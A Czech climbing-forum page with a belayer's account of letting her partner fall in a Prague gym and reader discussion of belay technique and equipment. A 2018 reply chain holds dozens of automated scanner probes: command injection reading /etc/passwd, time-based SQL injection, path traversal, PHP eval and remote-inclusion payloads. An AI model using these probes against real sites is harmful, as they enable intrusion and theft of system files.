LEZEC  OBCHOD  DISKUSE  INZERCE  ANKETY  ODKAZY  PRŮVODCE  MAPY  FOTKY  VIDEO 

 jméno

 heslo 

 Registrace   |   Omluvenky nepadaj, jde se lézt.
Hledání cesty

Hledání na Lezci

PRÁCE PRO LEZCE
Fasádní Servis
 Metodika
 Trénink
 Ledy
 Skialpy
Knihy
Update sprievodca Jelenec
Pomozte vydat knihu Dobrodružství v prášku… přidáte jen vodu
Křest lezeckého průvodce Vltavská žula

Závody
Secret Spot Bouldering 2024 (19.10)
MČR v bouldru (19.10)
Boulder OPEN 2020 LA SKALA (26.10)

Žebříček
Cesty:
51.Zaoral 10075
52.Zedek 10072
53.Gospoš 10037
Bouldry:
51.Šauli 8409
52.Palivec 8403
53.Stadtherr 8403
Hory:
15.Y 5373
16.Louda 5220
17.Abt 5186

Výsledky
MČR rychlolezení (13.10)
SP Praha (20.09)
EP obtížnost Bologna (14.09)

Deníčky
5668 lezců
1140420 cest
Nové přelezy:
Nymfa 8A+
Seastar 7C
Ortofrutta 7c
Koma Xc
Mr. Morgen 7b
Ri Rock 7b+
Les Furtif 8b+
Loose Cano 7b
Ajo En Vag 7C
Hammer Kin 7c

Stěny
Rock 'n' Wall - Plzeň
Lezecké centrum SmíchOFF - Praha 5
Boulder Bar - Praha 7

Prodejny
LANEX eshop - Bolatice
Rock Point OC Olympia - Brno
Outdoor Centrum Rock Point Masarykova - Brno

Kontakt
REDAKCE:
standalezec.cz
ŠÉFREDAKTOR:
jirkaslezec.cz
INZERCE:
standalezec.cz
IT:
hoplezec.cz

Tohle se mi přeci nemůže stát!

Může

Zavolal mi kamarád: „mám cestu do Práglu, co takhle Smíchoff? Povídám:“No jasně, všechny svolám a sejdem se na večer na stěně“!

Zavolal mi kamarád: „mám cestu do Práglu, co takhle Smíchoff? Povídám: “No jasně, všechny svolám a sejdem se na večer na stěně“!

Vše domluveno, organizace super, jelo se! Tří v autě, Pepa čtrtej, není problém. Cesta, jelikož to máme ze Slanýho kousek, probíhala kupodivu na pohodu. Praha bez zácpy. Jsme na místě za dvacet minutek. To už Pepa stepuje celej natěšenej. Přeci jenom si to řádně vychutnává, z Humpolce to má cca 150km. Rozlez na osm mínuskách na pohodu, já pokorně popolejzám za ním. Pepovi se dařilo v Ospu, tak buší a buší…další a další cesta…teď je na řadě osm plusák…leze, leze, dlouhej krok do strany, povoluju lano, v tom chce dobrat…dobírám a šup, už padá. V tý rychlosti mi lano vystřelilo z ruky, ve zmatenosti chytám levou, prokluzuje, pravou už nestíhám a Pepa sedí na podlážce…

Byl to pád cca 6m, lehce dobržděnej prokluzem ruky přímo přes lano (lano 9,2-chtěla jsem akorát pořídit slabý…už néééé), protože ho beru levou (sem pravák). Pepa říkal, že ho to lehce přibrzdilo…Vstává, oklepe se a je na pohodu! Šok ale strašnej. Aspoň pro mě…pro něj určo taky, i když to nedal znát! Vše se na minutku-dvě zastaví a na stěně je utichlo, i když tam mohlo být cca kolem stovky lidí…prostě rána!
Vždycky sem si říkala, že tohle se mi nemůže stát, že by to musela být sakra náhoda nebo neschopnost, že bych pustila lano…a ejhle…je to tu.

Po vzpamatování jsme si sedli na lavičce a kecali. Nic se nestalo, takže si z toho akorát všicí dělali srandu. Půlka lidí začalo s historkama, jak už někoho taky pustili, jak se jim povedlo něco podobného. Že nejsem vyjímka. Dokonce hlášky jako takovýhle zkušenosti jsou k nezaplacení aj…ale stejně to nepomáhá! Vždyť jsem ho málem zmrzačila!!!!

Ruka  popálená. Naštěstí tam byl klučina, co se popáleninám věnoval 2roky. Po jeho radách chladím a chladím…chladím celou noc, protože jakmile studené sundám, ruka je jak v ohni. Prý popálenina 2A..cca 7-9dní, než se udělá nová kůže. Furt to ale je úplné nic proti tomu, co mám pořád dokola před očima!

Jelikož sem holka a okolo mám spousty a spousty kluků-lezců, na jejich většinou vyšší váhu jsem si už tak nějak zvykla. Cuknutí a občasné (při jištění Malečka-115kg) to nakopnutí-na to už sem si zvykla. Teda myslela jsem si to, do včera. S lezením už mám tu čest plus mínus pět let, blbosti se občas stanou každému, když je nálada, jde to samo. Tohle ale byla šílená chyba, kterou už si budu pamatovat nadosmrti. Už taky vím, že nikdy nebudu říkat nikdy, nikdy se ti to nemůže stát! Může a je to taková rychlost, že ti všechno dochází až zpětně, když si všechno přehráváš. Vždyť i Lin Hill se povedlo špatně se navázat a přežít pád z 20metrů.

Gábina Houdová   [úpravy] 15:24 04.06.2010Tisk 

Reklama:


Související články:

Komentáře

     
...nové příspěvkyNový komentář 

 No dobry..15:55:28 04.06.2010
Nadpis rika vse.
Taky mam par podobnejch historek, svejch i cizich, z lezeni i odjinud. Nekdy to bejva o chlup.
Gratuluju ke stastnymu konci.
Lze doufat ze se po precteni par lidi zamysli a tim zabrani vzniku dalsich historek..
 Ďuraodpovědět 
 Re: No dobry..16:39:43 14.06.2018
1
response.write(9914841*9524740)odpovědět 
 Re: No dobry..16:39:46 14.06.2018
1
'+response.write(9914841*9524740)+'odpovědět 
 Re: No dobry..16:39:48 14.06.2018
1
"+response.write(9914841*9524740)+"odpovědět 
 Re: No dobry..16:46:17 14.06.2018
1
SomeCustomInjectedHeader:injected_by_wvsodpovědět 
 Re: No dobry..16:46:20 14.06.2018
1
SomeCustomInjectedHeader:injected_by_wvsodpovědět 
 Re: No dobry..16:46:25 14.06.2018
1
SomeCustomInjectedHeader:injected_by_wvsodpovědět 
 Re: No dobry..16:47:53 14.06.2018
1
&cat /etc/passwd&odpovědět 
 Re: No dobry..16:47:56 14.06.2018
1
'&cat /etc/passwd&'odpovědět 
 Re: No dobry..16:47:59 14.06.2018
1
"&cat /etc/passwd&"odpovědět 
 Re: No dobry..16:48:02 14.06.2018
1
cat /etc/passwd odpovědět 
 Re: No dobry..16:48:06 14.06.2018
1
`cat /etc/passwd`odpovědět 
 Re: No dobry..16:48:10 14.06.2018
1
|cat /etc/passwd#odpovědět 
 Re: No dobry..16:48:13 14.06.2018
1
'|'ldodpovědět 
 Re: No dobry..16:48:17 14.06.2018
1
"|"ldodpovědět 
 Re: No dobry..16:48:20 14.06.2018
1
;cat /etc/passwd;odpovědět 
 Re: No dobry..16:48:24 14.06.2018
1
';cat /etc/passwd;'odpovědět 
 Re: No dobry..16:48:27 14.06.2018
1
";cat /etc/passwd;"odpovědět 
 Re: No dobry..16:48:32 14.06.2018
1
||cat /etc/passwdodpovědět 
 Re: No dobry..16:51:19 14.06.2018
1
1 and sleep(9.344) odpovědět 
 Re: No dobry..16:51:22 14.06.2018
1
1 or (sleep(9.344)+1) limit 1 -- odpovědět 
 Re: No dobry..16:51:25 14.06.2018
1
1' and sleep(9.344)='odpovědět 
 Re: No dobry..16:51:28 14.06.2018
1
1' and (sleep(9.344)+1) limit 1 -- odpovědět 
 Re: No dobry..16:51:32 14.06.2018
1
1" and sleep(9.344)="odpovědět 
 Re: No dobry..16:51:35 14.06.2018
1
1' or (sleep(9.344)+1) limit 1 -- odpovědět 
 Re: No dobry..16:51:38 14.06.2018
1
1" or (sleep(9.344)+1) limit 1 -- odpovědět 
 Re: No dobry..16:51:41 14.06.2018
1
1'=sleep(9.344)='odpovědět 
 Re: No dobry..16:51:43 14.06.2018
1
1"=sleep(9.344)="odpovědět 
 Re: No dobry..16:51:47 14.06.2018
1
1;select pg_sleep(9.344); -- odpovědět 
 Re: No dobry..16:51:50 14.06.2018
1
1';select pg_sleep(9.344); -- odpovědět 
 Re: No dobry..16:51:54 14.06.2018
1
1; waitfor delay '0:0:9.344' -- odpovědět 
 Re: No dobry..16:51:57 14.06.2018
1
1'; waitfor delay '0:0:9.344' -- odpovědět 
 Re: No dobry..16:52:00 14.06.2018
1
1"; waitfor delay '0:0:9.344' -- odpovědět 
 Re: No dobry..17:03:34 14.06.2018
1
${99193+99540}odpovědět 
 Re: No dobry..17:09:42 14.06.2018
1
1odpovědět 
 Re: No dobry..17:09:45 14.06.2018
1
268435455odpovědět 
 Re: No dobry..17:09:48 14.06.2018
1
ăhodpovědět 
 Re: No dobry..17:09:53 14.06.2018
1
..ŔŻodpovědět 
 Re: No dobry..17:09:56 14.06.2018
1
1e309odpovědět 
 Re: No dobry..17:10:00 14.06.2018
1
'"\'\");|]*{ <>odpovědět 
 Re: No dobry..17:10:04 14.06.2018
1
1odpovědět 
 Re: No dobry..17:11:39 14.06.2018
1
../../../../../../../../../../etc/passwdodpovědět 
 Re: No dobry..17:11:43 14.06.2018
1
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%0odpovědět 
 Re: No dobry..17:11:48 14.06.2018
1
../../../../../../../../../../etc/passwd.jpgodpovědět 
 Re: No dobry..17:11:52 14.06.2018
1
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5nodpovědět 
 Re: No dobry..17:11:56 14.06.2018
1
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%0odpovědět 
 Re: No dobry..17:11:59 14.06.2018
1
/../..//../..//../..//../..//../..//etc/passwd.jpgodpovědět 
 Re: No dobry..17:12:03 14.06.2018
1
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwdodpovědět 
 Re: No dobry..17:12:06 14.06.2018
1
/etc/passwdodpovědět 
 Re: No dobry..17:12:09 14.06.2018
1
../..//../..//../..//../..//../..//../..//../..//../..//etc/passodpovědět 
 Re: No dobry..17:12:14 14.06.2018
1
../.../.././../.../.././../.../.././../.../.././../.../.././../.odpovědět 
 Re: No dobry..17:12:17 14.06.2018
1
..ŔŻ..ŔŻ..ŔŻ..ŔŻ..ŔŻ..ŔŻ..ŔŻ..ŔŻetc/passwdodpovědět 
 Re: No dobry..17:12:21 14.06.2018
1
invalid../../../../../../../../../../etc/passwd/././././././././odpovědět 
 Re: No dobry..17:12:25 14.06.2018
1
file:///etc/passwdodpovědět 
 Re: No dobry..17:12:30 14.06.2018
1
/\../\../\../\../\../\../\../etc/passwdodpovědět 
 Re: No dobry..17:12:34 14.06.2018
1
WEB-INF/web.xmlodpovědět 
 Re: No dobry..17:12:40 14.06.2018
1
WEB-INF\web.xmlodpovědět 
 Re: No dobry..17:14:45 14.06.2018
1
http://some-inexistent-website.acu/some_inexistent_file_with_lonodpovědět 
 Re: No dobry..17:14:49 14.06.2018
1
1some_inexistent_file_with_long_name%00.jpgodpovědět 
 Re: No dobry..17:14:52 14.06.2018
1
http://testasp.vulnweb.com/t/fit.txt?%00.jpgodpovědět 
 Re: No dobry..17:14:55 14.06.2018
1
testasp.vulnweb.comodpovědět 
 Re: No dobry..17:49:48 14.06.2018
1
)odpovědět 
 Re: No dobry..17:49:54 14.06.2018
1
!(()&&!|*|*|odpovědět 
 Re: No dobry..17:49:59 14.06.2018
1
^(#$!@#$)(()))******odpovědět 
 Re: No dobry..17:55:31 14.06.2018
1
1odpovědět 
 Re: No dobry..17:55:36 14.06.2018
1
'"()odpovědět 
 Re: No dobry..18:19:17 14.06.2018
1
;print(md5(acunetix_wvs_security_test));odpovědět 
 Re: No dobry..18:19:47 14.06.2018
1
;print(md5(acunetix_wvs_security_test));odpovědět 
 Re: No dobry..18:20:10 14.06.2018
1
';print(md5(acunetix_wvs_security_test));$a='odpovědět 
 Re: No dobry..18:20:40 14.06.2018
1
';print(md5(acunetix_wvs_security_test));$a='odpovědět 
 Re: No dobry..18:21:07 14.06.2018
1
";print(md5(acunetix_wvs_security_test));$a="odpovědět 
 Re: No dobry..18:21:37 14.06.2018
1
";print(md5(acunetix_wvs_security_test));$a="odpovědět 
 Re: No dobry..18:21:59 14.06.2018
1
${@print(md5(acunetix_wvs_security_test))}odpovědět 
 Re: No dobry..18:22:14 14.06.2018
1
${@print(md5(acunetix_wvs_security_test))}\odpovědět 

 treba si vyčistiť hlavu...15:56:26 04.06.2010
Tiež som zažil čo som myslel že nezažijem, že si to Schubert vymýšľa - prvá cesta na umelej stene na rozlezenie, dákych 5 niečo, leziem leziem a až niekde v 6m mi tak nejak došlo že som ešte nič necvakol. To už to dolu šumelo - domáci (rakúšan) si to všimol a začal nadávať, že sa musí cvakať všetko, že je to proti predpisom a tak... myslel že tam frajerím a ja som proste zabudol!!!
Je fakt že som mal za sebou týždeň plný stresu, hlavu plnú ptákovín, cudzie prostredie, proste nebol som sústredený na lezenie a nemal som tam čo robiť.
Poučenie to bolo dobré, našťastie sa nič nestalo a nabudúce si dám majzla aby som sa sústredil na to čo robím.
dodoodpovědět 

 Hm16:22:43 04.06.2010
to měl štěstí že byl jen v 6 metrech. Čím jistíš?
Tomodpovědět 

 taky18:10:20 04.06.2010
též jsem zažil takřka totožnou situaci a já byl ten na horním konci lana. Je fakt, že já osobně když lezu, tak zapomínám na všechno ostatní a soustředím se jen na lezení, ale zároveň vím, že neni dobrý lízt pro to, abych si udělal čisto a pořádek v hlavě. Což nemíním na tvůj účet, ale spíš s ohledem na tu mojí situaci, která byla narušena právě poněkud narušenou psychikou....dobrá prevence proti tomuhle je taky vhodný jistítko v kombinaci s tloušťkou lana. Např mě když spadne kamarád do lana, tak ho vůbec nemusim držet a zastaví se samo
malíkodpovědět 
 Přesně tak...18:41:34 04.06.2010
Stát se to může prostě každému, tak moc nerozumím lidem co jsou vysazený přímo jen na kyblíky, s tím bych se spolulezce opravdu bál jistit. Používám grigrinu, kdy lano podávám stejně jako kdybych měl kyblík (tzn. vůbec nešáhnu na brzdu, která se dá zablokovat přičemž může vzniknout panic efekt...) Když si člověk nacvičí takovej grif, tak není problém povolit na cvaknutí i tlustý lano stejně jako kdyby měl kyblík... A volný konec lana drží v ruce , což je skvělej sichr, protože by grigrina v normální situaci měla chytnout i kdyby se lano nedrželo... Mammut Smart mi příjde taky super, ale s tím zase tak dlouho nelezu, aby se mi o tom chtělo psát :)
Klempyodpovědět 
  Re: Přesně tak...19:04:26 04.06.2010
Chce to neco co jisti uplne samo... takovy elektronicky GriGri.... a pak jeste neco co leze samo... To bude paraaada
Preklizkacodpovědět 
  Re: Přesně tak...19:04:27 04.06.2010
Chce to neco co jisti uplne samo... takovy elektronicky GriGri.... a pak jeste neco co leze samo... To bude paraaada
Preklizkacodpovědět 
   Re:19:13:02 04.06.2010
Jo, to je skvělej fór, ale vážně myslím že by lezení mělo být nebezpečný vybráním nebezpečný cesty a ne zvýšením pravděpodobnosti, že tě zmrzačí/zabije tvůj kamarád :))
Klempyodpovědět 
    Re:20:24:14 04.06.2010
Klempy asi te zklamu. Kyblik se mi jeste nepodelal, ale grigri se mi uz seklo v otevrene podobe kdyz jsem deckam ukazoval jak by theoreticky mohlo zustat odblokovany. To decka cucely. A uz slo do kose.
Stepan ptacekodpovědět 
     Re:21:12:24 04.06.2010
Jo :) říkám chce to chytit do rukou ten grif, aby se nesekala když podáváš a nemačkáš brzdu.Kyblík má taky výhody, třeba že některé lidi na "automatický" jistítka hřeší tím, že jim moc věří, zanedbávají jištění a pak je to paradoxně horší.
Klempyodpovědět 
  Re: Přesně tak...09:44:35 05.06.2010
Klempy: bohužel je na netu dost videí, kdy grigri projela, jde z toho mráz po zádech, když na to člověk čučí... :(
Jimboodpovědět 
   Re: Přesně tak...11:38:26 08.06.2010
Najviac zemoviek som videl prave s grigri, preto by som sa tym asi nenechal istit. Aj ked uznavam, ze ak to clovek vie....

Na grigri mi velmi vadi aj to, ze sa neda kontrolovat preklz, co je podla mna v mnohych cestach pri isteni tiez velmi dolezite. Ale urcite je lepsie, ked je lezec zastaveny natvrdo a doudiera sa o skalu, ako ked dostane preklz az na zem.
vlado francekodpovědět 

 hodne blba "zkusenost"20:36:27 04.06.2010
no, uplne stejny pocity, ten sok je pak strasnej, stalo se mi to samy, taky sem nepochopila, kde se stala chyba, lehka cesta na stene, asi i velka unava v tom hrala roli, ale nastesti taky bez nasledku. na skalach zachyceno x padu tezsich kamosu. celkem tezky si pak zase verit, kdyz do ty doby si veris a stejne se to stane. a pak se nahod zpet a jisti jako driv, chvili sem pochybovala zda dal lezt a jistit. nastesti vse je zpet hlavne diky kamosum ale nepreju to nikomu.
odpovědět 

 ...21:01:25 04.06.2010
Zautomatizování pohybů a úkonů je na skále největším nepřítelem...¨Je to ale skvělá zkušenost, bo žádná úpozitivní situace by tě tak kvalitně nevyškolila:), asi jako mne, když jsem se rozsekal v autě, teď řídim o 100% svědomitěji, díky bohu za takovou zkušenost
vojtaodpovědět 

 a22:33:42 04.06.2010
Hlavní je že jsis uvědomila tu chybu... čas od času se prostě nějakej ten blackout stane. Snad to brzo rozdejcháš ty i lezec
j.odpovědět 

 gri gri, cinch23:32:08 04.06.2010
gri gri res vse, teda temer....
odpovědět 

 na každého dojde... :-)23:39:39 04.06.2010
Jó, tak na tohle Gabčo vždycky pomatuj.
Já jsem taky jednou hodil prdeláka z deseti metrů a vod tý doby vím, že když jsem tři metry nad kruhem, tak půjdu 5-7m pod kruh...
Vod tý doby to mám pěkně ve voku :-)
Mirekodpovědět 

 jištění10:40:48 05.06.2010
Jen tak pro zvědavost, čím si ho jistila?
re..odpovědět 

 Chybky11:14:05 05.06.2010
Na konci clanku ma byt asi Lynn Hill.

Trochu nechapu, jak se mohlo stat to co popisujes. Dovedu si predstavit ze ti vypadne z ruky lano protoze nedavas pozor nebo se venujes necemu jinemu, ale kdyz rikas ze to bylo uprostred komunikace s lezcem tak je to trochu podivne. Mohla bys prosim upresnit:

1) jake to bylo jistitko
2) mela jsi v danou chvili brzdici ruku pod jistitkem (jako v "zamcene" poloze) nebo nad nim  jako pri dobirani (oba prameny lana u sebe, jistitko v tu chvili malo brzdi)
3) vypadlo ti lano kdyz jsi rukama nic nedelala a prisel pad, nebo behem toho co jsi se snazila rychle prehmatavat rukama polane abys lezce co nejrychleji dobrala a do toho prisel pad (takze jsi na zlomek vteriny treva lano nedrzela)
Dik za doplnujici informace.
odpovědět 

 taky se mi povedlo20:04:46 05.06.2010
Normálně lezeme na stěně na starý hydře chlupatý, už je různě ořezaná asi na čtyřicet metrů (máme vysokou stěnu, pětadváca nestačí).
Kámoš přinesl nový lano, moc pěkný, měkoučký, leskloučký... jistila jsem kyblíkem, kecala s člověkem vedle mě a prvolezec vyplul v cestě, v které normálně nepadá. Naštěstí byl dost vysoko (cesty jsou i dvacetimetrový), takže ve finále jsem ho chytla ještě nad zemí...

... jak se to stalo, nejsem schopná dát dohromady - řekla bych, že jsem mu prostě povolovala lano a jak jsem byla zvyklá z hydry chlupatý, tak jsem brzdící rukou cpala lano do kyblíku, takže když skočil, tak mi lano vyrval z ruky a protože to nebyla hydra, ale bleskovka, tak chvíli trvalo, než se kyblík seknul. V nějaké fázi jsem to lano chytla, ale stejně si myslím, že podlahu nedal jen díky kyblíku, že kdyby se lano neseklo tak nevím, jeslti bych ho udržela....
Poučení - nekrafat při jištění, i když lezete a jistíte patnáct let a i když je lezec na něčem, co by měla být "brnkačka". Zvlášť pokud jistíte na něčem, na co nejste zvyklí (nové lano, nové jistítko, jiná ruka atd.)
sallyodpovědět 
 Re: taky se mi povedlo17:41:30 07.06.2010
Ahoj, niekedy v aprili som kupil nove lano beal booster 9.7. Pri prvom odsadnuti do tohoto lana som sa zlakol, ze ma spolulezec pustil :).
Nakolko sme boli zvyknuty na starsie, pomale, x krat v prachu vyvalane lano, tak spolulezec necakal ako rychlo nove pobezi. Esteze som bol vysoko a spolulezec pozorny :).
Doma som sa pozrel na papiere co som dostal k lanu a je tam doslova napisane, ze pri prvych pouzitiach treba davat zvyseny pozor, pretoze brzdne sily mozu byt trosku znizene... Holt kazde lano je ine a treba sa dobre pozriet, co k nemu uvadza vyrobca :) Nie je matros ako matros a na novy si treba zvykat.
Teraz mi to lano pride uplne bezproblemove, len ten prechod bol trosku prekvapujuci.
luboodpovědět 

 co se teda stalo?12:19:27 06.06.2010
Hezky napsany a je opravdu potreba si uvedomit ze se cokoliv muze stat komukoliv. Kazdopadne nebylo receno, proc k nehode doslo, co bylo zanedbano, coz by nas vsechny asi zajimalo...
Dannyodpovědět 
 Re: co se teda stalo?12:45:17 06.06.2010
Taky mi zde schází to nepodstatnější. Autorka zde píše o chybě. Ale o jaké, již jaksi zapomněla dodat. Článek pro poučení má tak takřka nulovou hodnotu, krom toho, že má člověk vždy býti ve střehu, ale to je snad jasné...
Zdeněkodpovědět 

 taky se mně to stalo14:00:42 06.06.2010
Taky se mně něco podobného přihodilo. Od té doby jsem jistím spolehlivěji a vždy se snažím o zrakovou kontrolu, pokud je možná. Pokud se nic nestane, myslím, že je takováhle zkušenost velice přínosná.
socaodpovědět 
 Re: taky se mně to stalo14:17:16 06.06.2010
Na rozdil od tohoto clanku.
odpovědět 

 pad20:28:20 06.06.2010
nieco podobne sa mi stalo ale horsie...nevsimol som si ze lano je kratsie a kamarat z letel asi s 8 metrov..nastastie som ho chital a zbrzdil som mu pad..ale stali pri nas vsetci sväty
ezecodpovědět 

 pad20:28:22 06.06.2010
nieco podobne sa mi stalo ale horsie...nevsimol som si ze lano je kratsie a kamarat z letel asi s 8 metrov..nastastie som ho chital a zbrzdil som mu pad..ale stali pri nas vsetci sväty
ezecodpovědět 

 Přiznání:)10:19:37 07.06.2010
Čekala jsem teda větší kritiku. za chyby se omlouvám, je jich tam víc!
Kde se stala chyba...no to je dost jasné mi příjde! Vždycky je to chyba jističe! (u mě teda určo!) + asi jenom polehčující okolnost a to bylo to lano. Moje nebylo, nikdy sem s takhle tenkym nejistila...takže taky poučení (radši všechno svoje, nebo max ozkoušené)
A jistítko mám reverso_3. Nikdy sem s tím problém neměla!
Gábinaodpovědět 
 Re: Přiznání:)10:28:25 07.06.2010
Tak jsem si to přečet...docela štěstí. Gabčo drž se - skály i jistítka;)
 martanodpovědět 
  Re: Přiznání:)12:59:37 07.06.2010
Ahoj. Mám jednu stejnou zkušenost, mimochodem také s novým tenkým lanem. Dopadlo to prokluzem až na zem a "trochu tvrdším doskokem" bez následků. Já měl spálenou ruku. Dodnes nevím, co přesně se stalo, myslím si ale, že jsem nedržel lano v celé dlani a vykloulo mi. Chytl jsem ho druhou rukou pod jistítkem ATC Guide, ale jak bylo rozjeté, už bylo těžké to zaseknout.. Vzácné poučení pro mě i pro ty, co učím...
Gejzaodpovědět 
 Re: Přiznání:)13:06:27 07.06.2010
Kombinace nového 9.2 lana, malé zkušenosti s tímto lanem a ne uplne vhodneho jistitka je smrtelná. V kalíškách může dojít při pádu k tomu, že lano nejde zářezem ale přes hranu a tím pádem není tření takové. Grigri to nebere. Nejlepší je na tohle Sinch nebo osma MAMUT se zářezem ve větším oku, kam lano při pádu automaticky ze všech pozic sklouzne. Nebyla to pouze tvoje chyba, ale chyba prvolezce. Já jako prvolezec důrazně upozorňuji jističe na tyto situace pokud si nejsem jistý, že je v situaci jako doma. Jističe si také stavím vzhledem k možnému pádu a hlavně k jištění, které zakládám k prvnímu kruhu. Paradoxně se také ptám starších matadorů (např. Krauskopfa když mě poprvé jistil - což u kolemstojících vyvolalo smích) jak umí jistit, jelikož z vlastní zkušenosti vím, že ti starší mají relativně méně zkušeností s chytáním, protože dříve platila zásada nepadat(nemyslím samozřejmě všechny). S novým lanem 9.2 jsem dokonce odmítal """dobírat!!!! svého 105 kg vážícího kamaráda, jelikož některé typy těchto lan se skoro nedají v osmě udržet při této váze jednou rukou.
O.J.odpovědět 
 Re: Přiznání:)14:16:32 07.06.2010
Já byl s výsledkem spokojen. V převisech pak bylo krásně volno :-)
pbla4024odpovědět 
 Re: Přiznání:)11:07:09 11.06.2010
No jasne ze je to chyba jistice, pokud se tu bavime o lezeni obecne, tak prvolezec nemuze upozornovat na svuj eventuelni pad, napr. nekde ve vicedelkach a v horach to neni mozne a jistic musi pocitat s padem kdykoliv. Stejne jako by mel jistit prvolezce rukama (jao na bouldrech) nez cvakne prvni jisteni od zeme! Osobne mi pride kontraproduktivni prvolezcovo upozornovani na pad i na stene nebo na skalkach. Jistic je tam od toho aby koukal a jistil :) ale chce to aby se oba znali a vedeli co od sebe muzou ocekavat.
samozrejme se muze stat velice snadno chyba a to komukoliv.
Ja treba jednou hodil ze standu obe lana na zem :) nastesti jsme byli jen za prvni dylkou a kamosi byli dole.
Kazdopadne kdyz se neco prihodi, je dulezity nehodu vyhodnotit a poucit se z ni. Ne jen si rict, je to moje chyba, ale zamyslet co clovek udelal blbe a co moh udelat lip. Takze v tomhle pripade asi slaby lano a nepozornost. Nastesti se nic nestalo a prihoda bude slouzit jako velka zkusenost do budoucna ;)
Dannyodpovědět 

 a bude hur12:37:05 07.06.2010
A bude huř minulý týden sem se na palmovce dozvěděl když tam nejaký školitel učil mladé adeptky jistit na štandu u kruhu že vlastně po dolezu se cvakne odsedka a to stačí hned se muže dobírat a jistit a že prej dle novejch směrnic  odsedka pro jistění stačí když se nejistí natvrdo ale přez telo. Ještě že já sem stará skola a ten lodák si tam budu dávat dosmrti :))
llodpovědět 
 Re: a bude hur12:55:00 07.06.2010
Ahoj. No já jsem ten "školitel" s kterým jsi na Palmovce mluvil - jinak Honza Polák, přezdívaný Gejza, oddíl Hosohopo, ČHS instruktor RCI.
Necituješ mě úplně přesně. Doslova jsem jim říkal, že nepotřebují nezbytně dojišťovat druhým fousem na štandu, že stačí odsedka, a to v případě, že druholezce dobírají rovnou do štandu. V tu chvíli jsem učili pouze jištění druholzce. Odsedka jejich váhu unese v pohodě, pád jištěného druholezce nejde do těla, ale do štandu. Jde o komplexní vzdělávání nováčků a nouzové varianty, tedy kdy co zdvojovat, kdy přes tělo apod. je ještě čekají. Celé to odpovídá aktuální metodice ČHS - http://www.horosvaz.cz/index.php?cmd=page&id=81
Pokud to chceš probrat podrobně (při výuce jsem na tebe fakt neměl čas), tak zavolej a můžeme se sejít na stěně a projet si to - mob:777 764 143
Gejzaodpovědět 
  Re: a bude hur13:33:59 07.06.2010
Tak když už jsem se pustil do diskuse - ta horoškola je někdy přetechnizovaná a já s ní často nesouhlasím. Jednou mi dokonce 2 lektoři tvrdili, že se správně jistí prvolezec přímo ze štandu, takže jsem je přestal poslouchat a říkal jsem si že si to tam blbě přečetli anebo ta horoškola nepoužívá správnou logiku. V tvém případě bych nováčky učil "vždy" mít jejich fous lana v nějakém pevném - nejlépe druhém bodě, jelikož by se to mělo stát rutinní záležitostí, kde oni sami později zjistí, co si v určitých situacích můžou dovolit a toto vynechat. Nemnoho pádů od štandu bylo způsobeno tím, že si někdo (i já) spletl karabiny a odcvakl nesprávné lano.
O.J.odpovědět 

 špatné navázání15:15:11 07.06.2010
Mně se nepovedlo špatně se navázat, mně se úspěšně povedlo zapomenout, že se navazuju. Od té doby už zásadně s nikým přitom nekrafám a nikam přitom neodbíhám.
Lynn Hillodpovědět 
 Re: špatné navázání11:53:04 08.06.2010
Paka nečtou návody a všechno umí na OS. Není lano jako lano, není jistítko jako jistítko, není expres jako expres. Není pád jako pád. Není jistič jako jistič. Dnešní tenká lanka, zejména nová, hladká a klouzavá, vyžadují přesný "protikus", bleskovou reakci z plné koncentrace a rukavice na ruce. Jističi bez rutinního nácviku mnoha variant chytání pádu s tímto stále měnícím se matrošem jsou smrtelným postrachem prvozců i druhozců i savců v okolí.
Nestačí zachytit 999 pádů a jeden ne!!
Pako P.S.: Nána jedna pitomá předvedla celému světu, jak je zcela nekompetentní k bezpečnému zachycení pádu prvolezce.
Pakoodpovědět 
  cimprlich21:40:40 08.06.2010
ste tady všichni moc velký slečinky.tak radši hrajte šachy a neserte se do lezení,jo to musí mít člověk jinačí nervy ahned po takovim zážitku dělat jako by nic a jet v klidu a soustředěně dál.Mně už se stalo tolikrát že mně někdo pustil skoro na zem že už bych to ani nespočítal a byly to kolikrát hodně známý jména holt stává se .Podle mně se to stalo snad každýmu kdo už pár let leze,akorát že se k tomu málokdo přizná a většinou dělaj chytrý
ondraodpovědět 

 Jasne ze stigro nakonec...10:37:38 09.06.2010
Shodou okolnosti jsem stal hned vedle, takze sem si rikal a) sakra, jeste ze tam maji tu gumovou podlahu a b) ty kraso, jeste ze nestal nikdo pod nim.

Ono zrovna jsem se dival timhle smereme (nejistil jsem, ale premyslel kam dal) a videl jsem nasledujici: borec lezl celkem na pohodu, pak najednou rekl dober (teda tak mi to prislo, podival se dolu a neco zahuhlal) a soucasne si sedl - prislo mi to jako klasicke nacvicovai, co obcas nema rad grigri, na druhou stranu na co je uplne genialni. Gabina podle me proste nestihla vcas zaseknout, resp. prislo mi, ze perioda mezi dober a sednutim byla v radech milisekund, nikoliv sekund.

To sice neomlouva jistice, kazdopadne to ani neomlouva prvolezce, lec vzdy je chyba prvolezce, kdyz si holt zvoli bud blbej matros, nebo jistice. Na druhou stranu, je to asi jeden z aspektu, ktery obzvlaste k tezsim cestam patri - clovek se krci pod nejakym previsem, poradne nevidi, nejty jsou od sebe na natah ruky, takze jistic obcas sam nevi, jestli podavat nebo dobirat. Proste nektery mista jsou shitozni a nektery zase v pohode. Me se to jeste nestalo a snad ani nestane, proste davam bacha co to jde. Ale souhlasim, stat se to muze.
 upmanodpovědět 

 Foto dne:

Agnes
 Databáze cest:
Všechny cesty (179399)
Top cesty v ČR
Top bouldery v ČR
Nejnovější cesty:
AW III Bielatal
S-kante VII Bielatal
Dévertige Direct 7A Fontainebleau
Seastar 7C Fontainebleau
25. Jahrestag VII Bielatal
Nově komentované:
Banana Split 5c Paklenica
Zollamt 6A+ Bor
Hammer King 7c Brseč
Souhvězdí Marmota 7C Hradby U Kozla
Souhvězdí Marmota 7C Hradby U Kozla

 Nově v diskusi:
